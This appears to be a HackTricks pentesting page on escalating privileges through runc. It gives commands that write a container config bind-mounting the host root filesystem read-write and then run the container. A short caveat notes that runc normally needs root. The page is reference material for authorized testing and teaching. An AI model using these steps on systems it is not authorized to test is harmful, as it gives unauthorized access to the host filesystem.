hacktricks/linux-hardening/privilege-escalation/runc-privilege-escalation.md
Carlos Polop 245b50b5a0 a
2024-02-08 22:36:35 +01:00

3.6 KiB

RunC Privilege Escalation

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Basic information

If you want to learn more about runc check the following page:

{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %} 2375-pentesting-docker.md {% endcontent-ref %}

PE

If you find that runc is installed in the host you may be able to run a container mounting the root / folder of the host.

runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder

Inside the "mounts" section of the create config.json add the following lines:
{
    "type": "bind",
    "source": "/",
    "destination": "/",
    "options": [
        "rbind",
        "rw",
        "rprivate"
    ]
},

#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs

# Finally, start the container
# The root folder is the one from the host
runc run demo

{% hint style="danger" %} This won't always work as the default operation of runc is to run as root, so running it as an unprivileged user simply cannot work (unless you have a rootless configuration). Making a rootless configuration the default isn't generally a good idea because there are quite a few restrictions inside rootless containers that don't apply outside rootless containers. {% endhint %}

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